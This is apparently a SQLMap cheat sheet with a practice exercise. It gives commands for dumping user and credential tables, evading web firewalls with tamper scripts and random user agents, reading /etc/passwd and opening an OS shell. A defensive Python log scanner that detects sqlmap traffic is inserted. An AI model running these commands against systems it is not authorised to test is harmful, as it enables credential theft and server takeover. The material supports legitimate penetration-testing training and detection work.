SQLMap is the most powerful and comprehensive open-source tool for automated detection and exploitation of SQL injection (SQLi) vulnerabilities. It supports six injection techniques: Boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries, and out-of-band.
While you can pass URLs (-u) and cookies (--cookie) manually, the industry standard is to intercept the request with Burp Suite, save it to a .txt file, and pass that file to SQLMap with -r. SQLMap then parses all headers, cookies, and POST data from the saved request automatically.
# 1. In BurpSuite, intercept the vulnerable request.
# 2. Right-click -> "Copy to file" (save as request.txt).
# 3. Launch SQLMap using the file:
sqlmap -r request.txt --dbs
Once the injection is confirmed, map the database structure to find valuable data.
# Enumerate all databases:
sqlmap -r request.txt --dbs
# Get current user, current DB, and check for DBA privileges:
sqlmap -r request.txt --current-user --current-db --is-dba
# Enumerate tables in a specific database (-D):
sqlmap -r request.txt -D dvwa --tables
# Enumerate columns in a specific table (-T):
sqlmap -r request.txt -D dvwa -T users --columns
# Dump the entire table:
sqlmap -r request.txt -D dvwa -T users --dump
# Dump specific columns only (-C):
sqlmap -r request.txt -D dvwa -T users -C user,password --dump
You intercepted a request to an admin panel and saved it as request.txt. A WAF is configured to block injections containing whitespace. Build the sqlmap command to use the request file, dump the admin_creds table from the corp_db database, and use the space2comment tamper script to evade the firewall.
Web Application Firewalls (WAF) like Cloudflare will block default SQLMap payloads. We must tune the scanner to remain undetected.
# Add a delay between requests (in seconds) to avoid Rate Limiting:
sqlmap -r request.txt --delay=2
# Use a random, real browser User-Agent:
sqlmap -r request.txt --random-agent
# Use Tamper scripts to obfuscate payloads.
# space2comment.py replaces each space in the payload with an inline comment (/**/) to evade simple whitespace filters:
sqlmap -r request.txt --tamper=space2comment
# Increase scan aggressiveness (Level 1-5, Risk 1-3).
# Level 3+ injects into HTTP headers (User-Agent, Referer).
sqlmap -r request.txt --level=3 --risk=2
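As an added defensive counterpart to the evasion options above (this is example code, not part of the original cheat sheet), the following Python triage script runs over constructed access-log lines in combined log format. It flags the default SQLMap User-Agent that --random-agent replaces, the /**/ residue that space2comment leaves in the URI, and common payload shapes once comments are collapsed back to spaces; the log lines and the sqlmap version string in them are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /item.php?id=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /item.php?id=1%27/**/UNION/**/SELECT/**/1,2,3-- HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
COMMENT_RE = re.compile(r"/\*.*?\*/")
# Rules run on the URL-decoded URI with inline comments collapsed to spaces, so a
# space2comment payload ("UNION/**/SELECT") matches the same rule as "UNION SELECT".
PAYLOAD_RULES = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b", re.I),
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
    "boolean-tautology": re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I),
}

def classify(uri: str, ua: str) -> list:
    """Return indicator names for one request; an empty list means nothing matched."""
    indicators = []
    if ua.lower().startswith("sqlmap"):
        indicators.append("sqlmap-user-agent")  # default UA; --random-agent hides it
    decoded = unquote_plus(uri)
    if COMMENT_RE.search(decoded):
        indicators.append("comment-obfuscation")  # /**/ left behind by space2comment
    normalized = COMMENT_RE.sub(" ", decoded)
    for name, rule in PAYLOAD_RULES.items():
        if rule.search(normalized):
            indicators.append(name)
    return indicators

def analyze_log(text: str) -> list:
    """Return (ip, uri, indicators) for every parseable line that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            tags = classify(m["uri"], m["ua"])
            if tags:
                hits.append((m["ip"], m["uri"], tags))
    return hits
```

Running analyze_log(SAMPLE_LOG) flags only the two injection attempts, one by its default User-Agent plus a time-based payload and the other by its comment obfuscation plus a UNION SELECT, which is why UA checks alone are not sufficient once --random-agent is in play.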
If the DB user is root or a DBA, and the server is misconfigured to allow file or command access from the database (for example the FILE privilege in MySQL, or xp_cmdshell enabled in MSSQL), SQLMap can jump from the database to the underlying operating system.
# Read a file from the victim server:
sqlmap -r request.txt --file-read="/etc/passwd"
# The Holy Grail! Pop an interactive OS shell (RCE):
sqlmap -r request.txt --os-shell